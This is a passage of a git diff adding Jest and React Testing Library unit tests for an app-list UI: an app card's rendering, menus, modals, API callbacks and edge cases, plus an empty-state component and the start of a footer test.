container.querySelector('[class*="icon"]') || container.querySelector('img') + expect(iconElement || screen.getByText(mockApp.icon)).toBeTruthy() + }) + + it('should render app type icon', () => { + render() + expect(screen.getByTestId('app-type-icon')).toBeInTheDocument() + }) + + it('should display formatted 
edit time', () => { + render() + expect(screen.getByText(/edited/i)).toBeInTheDocument() + }) + }) + + describe('Props', () => { + it('should handle different app modes', () => { + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should handle app with tags', () => { + const appWithTags = { + ...mockApp, + tags: [{ id: 'tag1', name: 'Tag 1', type: 'app', binding_count: 0 }], + } + render() + // Verify the tag selector component renders + expect(screen.getByLabelText('tag-selector')).toBeInTheDocument() + }) + + it('should render with onRefresh callback', () => { + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + }) + + describe('Access Mode Icons', () => { + it('should show public icon for public access mode', () => { + const publicApp = { ...mockApp, access_mode: AccessMode.PUBLIC } + const { container } = render() + const tooltip = container.querySelector('[title="app.accessItemsDescription.anyone"]') + expect(tooltip).toBeInTheDocument() + }) + + it('should show lock icon for specific groups access mode', () => { + const specificApp = { ...mockApp, access_mode: AccessMode.SPECIFIC_GROUPS_MEMBERS } + const { container } = render() + const tooltip = container.querySelector('[title="app.accessItemsDescription.specific"]') + expect(tooltip).toBeInTheDocument() + }) + + it('should show organization icon for organization access mode', () => { + const orgApp = { ...mockApp, access_mode: AccessMode.ORGANIZATION } + const { container } = render() + const tooltip = container.querySelector('[title="app.accessItemsDescription.organization"]') + expect(tooltip).toBeInTheDocument() + }) + + it('should show external icon for external access mode', () => { + const externalApp = { ...mockApp, access_mode: AccessMode.EXTERNAL_MEMBERS } + const { container } = render() + const tooltip = container.querySelector('[title="app.accessItemsDescription.external"]') + expect(tooltip).toBeInTheDocument() + }) + }) + + describe('Card Interaction', () => { + it('should handle card click', () => { + render() + const card = screen.getByTitle('Test App').closest('[class*="cursor-pointer"]') + expect(card).toBeInTheDocument() + }) + + it('should call getRedirection on card click', () => { + const { getRedirection } = require('@/utils/app-redirection') + render() + const card = screen.getByTitle('Test App').closest('[class*="cursor-pointer"]')! 
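+      // The non-null assertion is safe: the preceding test verifies this clickable wrapper exists.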
+ fireEvent.click(card) + expect(getRedirection).toHaveBeenCalledWith(true, mockApp, mockPush) + }) + }) + + describe('Operations Menu', () => { + it('should render operations popover', () => { + render() + expect(screen.getByTestId('custom-popover')).toBeInTheDocument() + }) + + it('should show edit option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('app.editApp')).toBeInTheDocument() + }) + }) + + it('should show duplicate option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('app.duplicate')).toBeInTheDocument() + }) + }) + + it('should show export option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('app.export')).toBeInTheDocument() + }) + }) + + it('should show delete option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('common.operation.delete')).toBeInTheDocument() + }) + }) + + it('should show switch option for chat mode apps', async () => { + const chatApp = { ...mockApp, mode: AppModeEnum.CHAT } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText(/switch/i)).toBeInTheDocument() + }) + }) + + it('should show switch option for completion mode apps', async () => { + const completionApp = { ...mockApp, mode: AppModeEnum.COMPLETION } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText(/switch/i)).toBeInTheDocument() + }) + }) + + it('should not show switch option for workflow mode apps', async () => { + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.queryByText(/switch/i)).not.toBeInTheDocument() + }) + }) + }) + + describe('Modal Interactions', () => { + it('should open edit modal when edit button is clicked', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + const editButton = screen.getByText('app.editApp') + fireEvent.click(editButton) + }) + + await waitFor(() => { + expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument() + }) + }) + + it('should open duplicate modal when duplicate button is clicked', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + const duplicateButton = screen.getByText('app.duplicate') + fireEvent.click(duplicateButton) + }) + + await waitFor(() => { + expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument() + }) + }) + + it('should open confirm dialog when delete button is clicked', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + const deleteButton = screen.getByText('common.operation.delete') + fireEvent.click(deleteButton) + }) + + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + }) + + it('should close confirm dialog when cancel is clicked', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + const deleteButton = 
screen.getByText('common.operation.delete') + fireEvent.click(deleteButton) + }) + + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('cancel-confirm')) + + await waitFor(() => { + expect(screen.queryByTestId('confirm-dialog')).not.toBeInTheDocument() + }) + }) + }) + + describe('Styling', () => { + it('should have correct card container styling', () => { + const { container } = render() + const card = container.querySelector('[class*="h-[160px]"]') + expect(card).toBeInTheDocument() + }) + + it('should have rounded corners', () => { + const { container } = render() + const card = container.querySelector('[class*="rounded-xl"]') + expect(card).toBeInTheDocument() + }) + }) + + describe('API Callbacks', () => { + it('should call deleteApp API when confirming delete', async () => { + render() + + // Open popover and click delete + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('common.operation.delete')) + }) + + // Confirm delete + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-confirm')) + + await waitFor(() => { + expect(appsService.deleteApp).toHaveBeenCalled() + }) + }) + + it('should call onRefresh after successful delete', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('common.operation.delete')) + }) + + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-confirm')) + + await waitFor(() => { + expect(mockOnRefresh).toHaveBeenCalled() + }) + }) + + it('should handle delete failure', async () => { + (appsService.deleteApp as jest.Mock).mockRejectedValueOnce(new Error('Delete failed')) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('common.operation.delete')) + }) + + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-confirm')) + + await waitFor(() => { + expect(appsService.deleteApp).toHaveBeenCalled() + expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: expect.stringContaining('Delete failed') }) + }) + }) + + it('should call updateAppInfo API when editing app', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.editApp')) + }) + + await waitFor(() => { + expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-edit-modal')) + + await waitFor(() => { + expect(appsService.updateAppInfo).toHaveBeenCalled() + }) + }) + + it('should call copyApp API when duplicating app', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.duplicate')) + }) + + await waitFor(() => { + expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-duplicate-modal')) + + await waitFor(() => { + expect(appsService.copyApp).toHaveBeenCalled() + }) + }) + + it('should call onPlanInfoChanged after successful duplication', async () => { + render() + + 
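+      // onPlanInfoChanged is provided by the provider-context mock defined at the top of this file.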
+      fireEvent.click(screen.getByTestId('popover-trigger'))
+      await waitFor(() => {
+        fireEvent.click(screen.getByText('app.duplicate'))
+      })
+
+      await waitFor(() => {
+        expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument()
+      })
+
+      fireEvent.click(screen.getByTestId('confirm-duplicate-modal'))
+
+      await waitFor(() => {
+        expect(mockOnPlanInfoChanged).toHaveBeenCalled()
+      })
+    })
+
+    it('should handle copy failure', async () => {
+      (appsService.copyApp as jest.Mock).mockRejectedValueOnce(new Error('Copy failed'))
+
+      render(<AppCard app={mockApp} onRefresh={mockOnRefresh} />)
+
+      fireEvent.click(screen.getByTestId('popover-trigger'))
+      await waitFor(() => {
+        fireEvent.click(screen.getByText('app.duplicate'))
+      })
+
+      await waitFor(() => {
+        expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument()
+      })
+
+      fireEvent.click(screen.getByTestId('confirm-duplicate-modal'))
+
+      await waitFor(() => {
+        expect(appsService.copyApp).toHaveBeenCalled()
+        expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: 'app.newApp.appCreateFailed' })
+      })
+    })
+
+    it('should call exportAppConfig API when exporting', async () => {
+      render(<AppCard app={mockApp} onRefresh={mockOnRefresh} />)
+
+      fireEvent.click(screen.getByTestId('popover-trigger'))
+      await waitFor(() => {
+        fireEvent.click(screen.getByText('app.export'))
+      })
+
+      await waitFor(() => {
+        expect(appsService.exportAppConfig).toHaveBeenCalled()
+      })
+    })
+
+    it('should handle export failure', async () => {
+      (appsService.exportAppConfig as jest.Mock).mockRejectedValueOnce(new Error('Export failed'))
+
+      render(<AppCard app={mockApp} onRefresh={mockOnRefresh} />)
+
+      fireEvent.click(screen.getByTestId('popover-trigger'))
+      await waitFor(() => {
+        fireEvent.click(screen.getByText('app.export'))
+      })
+
+      await waitFor(() => {
+        expect(appsService.exportAppConfig).toHaveBeenCalled()
+        expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: 'app.exportFailed' })
+      })
+    })
+  })
+
+  describe('Switch Modal', () => {
+    it('should open switch modal when switch button is clicked', async () => {
+      const chatApp = { ...mockApp, mode: AppModeEnum.CHAT }
+      render(<AppCard app={chatApp} onRefresh={mockOnRefresh} />)
+
+      fireEvent.click(screen.getByTestId('popover-trigger'))
+      await waitFor(() => {
+        fireEvent.click(screen.getByText('app.switch'))
+      })
+
+      await waitFor(() => {
+        expect(screen.getByTestId('switch-modal')).toBeInTheDocument()
+      })
+    })
+
+    it('should close switch modal when close button is clicked', async () => {
+      const chatApp = { ...mockApp, mode: AppModeEnum.CHAT }
+      render(<AppCard app={chatApp} onRefresh={mockOnRefresh} />)
+
+      fireEvent.click(screen.getByTestId('popover-trigger'))
+      await waitFor(() => {
+        fireEvent.click(screen.getByText('app.switch'))
+      })
+
+      await waitFor(() => {
+        expect(screen.getByTestId('switch-modal')).toBeInTheDocument()
+      })
+
+      fireEvent.click(screen.getByTestId('close-switch-modal'))
+
+      await waitFor(() => {
+        expect(screen.queryByTestId('switch-modal')).not.toBeInTheDocument()
+      })
+    })
+
+    it('should call onRefresh after successful switch', async () => {
+      const chatApp = { ...mockApp, mode: AppModeEnum.CHAT }
+      render(<AppCard app={chatApp} onRefresh={mockOnRefresh} />)
+
+      fireEvent.click(screen.getByTestId('popover-trigger'))
+      await waitFor(() => {
+        fireEvent.click(screen.getByText('app.switch'))
+      })
+
+      await waitFor(() => {
+        expect(screen.getByTestId('switch-modal')).toBeInTheDocument()
+      })
+
+      fireEvent.click(screen.getByTestId('confirm-switch-modal'))
+
+      await waitFor(() => {
+        expect(mockOnRefresh).toHaveBeenCalled()
+      })
+    })
+
+    it('should open switch modal for completion mode apps', async () => {
+      const completionApp = { ...mockApp, mode: AppModeEnum.COMPLETION }
+      render(<AppCard app={completionApp} onRefresh={mockOnRefresh} />)
+
+      fireEvent.click(screen.getByTestId('popover-trigger'))
+      await waitFor(() => {
+        fireEvent.click(screen.getByText('app.switch'))
+      })
+
+      await waitFor(() => {
+        expect(screen.getByTestId('switch-modal')).toBeInTheDocument()
+      })
+    })
+  })
+
+  describe('Open in Explore', () => {
+    it('should show open in explore option when popover is opened', async () => {
+      render(<AppCard app={mockApp} onRefresh={mockOnRefresh} />)
+
+      fireEvent.click(screen.getByTestId('popover-trigger'))
+
+      await waitFor(() => {
+        expect(screen.getByText('app.openInExplore')).toBeInTheDocument()
+      })
+    })
+  })
+
+  describe('Workflow Export with Environment Variables', () => {
+    it('should check for secret environment variables in workflow apps', async () => {
+      const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW }
+      render(<AppCard app={workflowApp} onRefresh={mockOnRefresh} />)
+
+      fireEvent.click(screen.getByTestId('popover-trigger'))
+      await waitFor(() => {
+        fireEvent.click(screen.getByText('app.export'))
+      })
+
+      await waitFor(() => {
+        expect(workflowService.fetchWorkflowDraft).toHaveBeenCalled()
+      })
+    })
+
+    it('should show DSL export modal when workflow has secret variables', async () => {
+      (workflowService.fetchWorkflowDraft as jest.Mock).mockResolvedValueOnce({
+        environment_variables: [{ value_type: 'secret', name: 'API_KEY' }],
+      })
+
+      const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW }
+      render(<AppCard app={workflowApp} onRefresh={mockOnRefresh} />)
+
+      fireEvent.click(screen.getByTestId('popover-trigger'))
+      await waitFor(() => {
+        fireEvent.click(screen.getByText('app.export'))
+      })
+
+      await waitFor(() => {
+        expect(screen.getByTestId('dsl-export-modal')).toBeInTheDocument()
+      })
+    })
+
+    it('should check for secret environment variables in advanced chat apps', async () => {
+      const advancedChatApp = { ...mockApp, mode: AppModeEnum.ADVANCED_CHAT }
+      render(<AppCard app={advancedChatApp} onRefresh={mockOnRefresh} />)
+
+      fireEvent.click(screen.getByTestId('popover-trigger'))
+      await waitFor(() => {
+        fireEvent.click(screen.getByText('app.export'))
+      })
+
+      await waitFor(() => {
+        expect(workflowService.fetchWorkflowDraft).toHaveBeenCalled()
+      })
+    })
+  })
+
+  describe('Edge Cases', () => {
+    it('should handle empty description', () => {
+      const appNoDesc = { ...mockApp, description: '' }
+      render(<AppCard app={appNoDesc} onRefresh={mockOnRefresh} />)
+      expect(screen.getByText('Test App')).toBeInTheDocument()
+    })
+
+    it('should handle long app name', () => {
+      const longNameApp = {
+        ...mockApp,
+        name: 'This is a very long app name that might overflow the container',
+      }
+      render(<AppCard app={longNameApp} onRefresh={mockOnRefresh} />)
+      expect(screen.getByText(longNameApp.name)).toBeInTheDocument()
+    })
+
+    it('should handle empty tags array', () => {
+      const noTagsApp = { ...mockApp, tags: [] }
+      // With empty tags, the component should still render successfully
+      render(<AppCard app={noTagsApp} onRefresh={mockOnRefresh} />)
+      expect(screen.getByTitle('Test App')).toBeInTheDocument()
+    })
+
+    it('should handle missing author name', () => {
+      const noAuthorApp = { ...mockApp, author_name: '' }
+      render(<AppCard app={noAuthorApp} onRefresh={mockOnRefresh} />)
+      expect(screen.getByTitle('Test App')).toBeInTheDocument()
+    })
+
+    it('should handle null icon_url', () => {
+      const nullIconApp = { ...mockApp, icon_url: null }
+      // With null icon_url, the component should fall back to the emoji icon and render successfully
+      render(<AppCard app={nullIconApp} onRefresh={mockOnRefresh} />)
+      expect(screen.getByTitle('Test App')).toBeInTheDocument()
+    })
+
+    it('should use created_at when updated_at is not available', () => {
+      const noUpdateApp = { ...mockApp, updated_at: 0 }
+      render(<AppCard app={noUpdateApp} onRefresh={mockOnRefresh} />)
+      expect(screen.getByText(/edited/i)).toBeInTheDocument()
+    })
+
+    it('should handle agent chat mode apps', () => {
+      const agentApp = { ...mockApp, mode: AppModeEnum.AGENT_CHAT }
+      render(<AppCard app={agentApp} onRefresh={mockOnRefresh} />)
+      expect(screen.getByTitle('Test App')).toBeInTheDocument()
+    })
+
+    it('should handle advanced chat mode apps', () => {
+      const advancedApp = { ...mockApp, mode: AppModeEnum.ADVANCED_CHAT }
+      render(<AppCard app={advancedApp} onRefresh={mockOnRefresh} />)
+      expect(screen.getByTitle('Test App')).toBeInTheDocument()
+    })
+
+    it('should handle apps with multiple tags', () => {
+      const multiTagApp = {
+        ...mockApp,
+        tags: [
+          { id: 'tag1', name: 'Tag 1', type: 'app', binding_count: 0 },
+          { id: 'tag2', name: 'Tag 2', type: 'app', binding_count: 0 },
+          { id: 'tag3', name: 'Tag 3', type: 'app', binding_count: 0 },
+        ],
+      }
+      render(<AppCard app={multiTagApp} onRefresh={mockOnRefresh} />)
+      // Verify the tag selector renders (actual tag display is handled by the real TagSelector component)
+      expect(screen.getByLabelText('tag-selector')).toBeInTheDocument()
+    })
+
+    it('should handle edit failure', async () => {
+      (appsService.updateAppInfo as jest.Mock).mockRejectedValueOnce(new Error('Edit failed'))
+
+      render(<AppCard app={mockApp} onRefresh={mockOnRefresh} />)
+
+      fireEvent.click(screen.getByTestId('popover-trigger'))
+      await waitFor(() => {
+        fireEvent.click(screen.getByText('app.editApp'))
+      })
+
+      await waitFor(() => {
+        expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument()
+      })
+
+      fireEvent.click(screen.getByTestId('confirm-edit-modal'))
+
+      await waitFor(() => {
+        expect(appsService.updateAppInfo).toHaveBeenCalled()
+        expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: expect.stringContaining('Edit failed') })
+      })
+    })
+
+    it('should close edit modal after successful edit', async () => {
+      render(<AppCard app={mockApp} onRefresh={mockOnRefresh} />)
+
+      fireEvent.click(screen.getByTestId('popover-trigger'))
+      await waitFor(() => {
+        fireEvent.click(screen.getByText('app.editApp'))
+      })
+
+      await waitFor(() => {
+        expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument()
+      })
+
+      fireEvent.click(screen.getByTestId('confirm-edit-modal'))
+
+      // On success the modal should close and the list should refresh
+      await waitFor(() => {
+        expect(screen.queryByTestId('edit-app-modal')).not.toBeInTheDocument()
+        expect(mockOnRefresh).toHaveBeenCalled()
+      })
+    })
+
+    it('should render all app modes correctly', () => {
+      const modes = [
+        AppModeEnum.CHAT,
+        AppModeEnum.COMPLETION,
+        AppModeEnum.WORKFLOW,
+        AppModeEnum.ADVANCED_CHAT,
+        AppModeEnum.AGENT_CHAT,
+      ]
+
+      modes.forEach((mode) => {
+        const testApp = { ...mockApp, mode }
+        const { unmount } = render(<AppCard app={testApp} onRefresh={mockOnRefresh} />)
+        expect(screen.getByTitle('Test App')).toBeInTheDocument()
+        unmount()
+      })
+    })
+
+    it('should handle workflow draft fetch failure during export', async () => {
+      (workflowService.fetchWorkflowDraft as jest.Mock).mockRejectedValueOnce(new Error('Fetch failed'))
+
+      const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW }
+      render(<AppCard app={workflowApp} onRefresh={mockOnRefresh} />)
+
+      fireEvent.click(screen.getByTestId('popover-trigger'))
+      await waitFor(() => {
+        fireEvent.click(screen.getByText('app.export'))
+      })
+
+      await waitFor(() => {
+        expect(workflowService.fetchWorkflowDraft).toHaveBeenCalled()
+        expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: 'app.exportFailed' })
+      })
+    })
+  })
+
+  // --------------------------------------------------------------------------
+  // Additional Edge Cases for Coverage
+  // --------------------------------------------------------------------------
+  describe('Additional Coverage', () => {
+    it('should handle onRefresh callback in switch modal success', async () => {
+      const chatApp = createMockApp({ mode: AppModeEnum.CHAT })
+      render(<AppCard app={chatApp} onRefresh={mockOnRefresh} />)
+
+      fireEvent.click(screen.getByTestId('popover-trigger'))
+      await waitFor(() => {
+        fireEvent.click(screen.getByText('app.switch'))
+      })
+
+      await waitFor(() => {
+        expect(screen.getByTestId('switch-modal')).toBeInTheDocument()
+      })
+
+      // Trigger success callback
+      fireEvent.click(screen.getByTestId('confirm-switch-modal'))
+
+      await waitFor(() => {
+        expect(mockOnRefresh).toHaveBeenCalled()
+      })
+    })
+
+    it('should render popover menu with correct styling for different app modes', async () => {
+      // Test completion mode styling
+      const completionApp = createMockApp({ mode: AppModeEnum.COMPLETION })
+      const { unmount } = render(<AppCard app={completionApp} onRefresh={mockOnRefresh} />)
+
+      fireEvent.click(screen.getByTestId('popover-trigger'))
+      await waitFor(() => {
+        expect(screen.getByText('app.editApp')).toBeInTheDocument()
+      })
+
+      unmount()
+
+      // Test workflow mode styling
+      const workflowApp = createMockApp({ mode: AppModeEnum.WORKFLOW })
+      render(<AppCard app={workflowApp} onRefresh={mockOnRefresh} />)
+
+      fireEvent.click(screen.getByTestId('popover-trigger'))
+      await waitFor(() => {
+        expect(screen.getByText('app.editApp')).toBeInTheDocument()
+      })
+    })
+
+    it('should stop propagation when clicking tag selector area', () => {
+      const multiTagApp = createMockApp({
+        tags: [{ id: 'tag1', name: 'Tag 1', type: 'app', binding_count: 0 }],
+      })
+
+      render(<AppCard app={multiTagApp} onRefresh={mockOnRefresh} />)
+
+      const tagSelector = screen.getByLabelText('tag-selector')
+      expect(tagSelector).toBeInTheDocument()
+
+      // Clicking inside the tag selector must not bubble up and trigger card navigation
+      fireEvent.click(tagSelector)
+      expect(getRedirection).not.toHaveBeenCalled()
+    })
+  })
+})
diff --git a/web/app/components/apps/empty.spec.tsx b/web/app/components/apps/empty.spec.tsx
new file mode 100644
index 0000000000..8e7680958c
--- /dev/null
+++ b/web/app/components/apps/empty.spec.tsx
@@ -0,0 +1,53 @@
+import React from 'react'
+import { render, screen } from '@testing-library/react'
+import Empty from './empty'
+
+describe('Empty', () => {
+  beforeEach(() => {
+    jest.clearAllMocks()
+  })
+
+  describe('Rendering', () => {
+    it('should render without crashing', () => {
+      render(<Empty />)
+      expect(screen.getByText('app.newApp.noAppsFound')).toBeInTheDocument()
+    })
+
+    it('should render 36 placeholder cards', () => {
+      const { container } = render(<Empty />)
+      const placeholderCards = container.querySelectorAll('.bg-background-default-lighter')
+      expect(placeholderCards).toHaveLength(36)
+    })
+
+    it('should display the no apps found message', () => {
+      render(<Empty />)
+      // The shared i18n mock returns translation keys, so assert on the key itself
+      expect(screen.getByText('app.newApp.noAppsFound')).toBeInTheDocument()
+    })
+  })
+
+  describe('Styling', () => {
+    it('should have correct container styling for overlay', () => {
+      const { container } = render(<Empty />)
+      const overlay = container.querySelector('.pointer-events-none')
+      expect(overlay).toBeInTheDocument()
+      expect(overlay).toHaveClass('absolute', 'inset-0', 'z-20')
+    })
+
+    it('should have correct styling for placeholder cards', () => {
+      const { container } = render(<Empty />)
+      const card = container.querySelector('.bg-background-default-lighter')
+      expect(card).toHaveClass('inline-flex', 'h-[160px]', 'rounded-xl')
+    })
+  })
+
+  describe('Edge Cases', () => {
+    it('should handle multiple renders without issues', () => {
+      const { rerender } = render(<Empty />)
+      expect(screen.getByText('app.newApp.noAppsFound')).toBeInTheDocument()
+
+      rerender(<Empty />)
+      expect(screen.getByText('app.newApp.noAppsFound')).toBeInTheDocument()
+    })
+  })
+})
diff --git a/web/app/components/apps/footer.spec.tsx b/web/app/components/apps/footer.spec.tsx
new file mode 100644
index 0000000000..291f15a5eb
--- /dev/null
+++ b/web/app/components/apps/footer.spec.tsx
@@ -0,0 +1,94 @@
+import React from 'react'
+import { render, screen } from '@testing-library/react'
+import Footer from './footer'
+
+describe('Footer', () => {
+  beforeEach(() => {
+    jest.clearAllMocks()
+  })
+
+  describe('Rendering', () => {
+    it('should render without crashing', () => {
+      render(